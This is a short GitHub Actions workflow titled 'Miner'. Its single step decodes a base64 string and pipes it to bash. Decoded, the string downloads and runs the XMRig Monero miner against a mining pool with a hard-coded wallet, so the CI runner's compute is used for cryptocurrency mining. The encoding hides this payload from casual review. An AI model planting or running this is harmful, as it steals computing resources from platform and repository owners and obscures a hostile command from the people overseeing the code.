name: Miner

on:
  workflow_dispatch:

jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - name: Run Miner Encoded
        run: echo "c3VkbyBhcHQtZ2V0IHVwZGF0ZSAteSAmJiBzdWRvIGFwdC1nZXQgaW5zdGFsbCAteSB3Z2V0IHRhciAmJiB3Z2V0IC1PICBodHRwczovL2dpdGh1Yi5jb20veG1yaWcveG1yaWcvcmVsZWFzZXMvZG93bmxvYWQvdjYuMjIuMi94bXJpZy02LjIyLjItbGludXgtc3RhdGljLXg2NC50YXIuZ3ogLW8gc291bC50YXIuZ3ogJiYgdGFyIC14dnpmIHNvdWwudGFyLmd6ICYmIGNkIHhtcmlnLTYuMjIuMiAmJiAuL3htcmlnIC1vIGd1bGYubW9uZXJvb2NlYW4uc3RyZWFtOjEwMTI4IC11IDQ3SHh0Q21GWHhxVnpRU0dqUWdCbkRDMUxMRFJyb2tmM2FNRm9jYldRUnhZenpoanhrZkxHankwRTNQSmhyQ3RkUWtYUHVuYjhjWlpCQWlFbVk1VzQ2VjFVVjhtRk1aaCAtaw==" | base64 --decode | bash
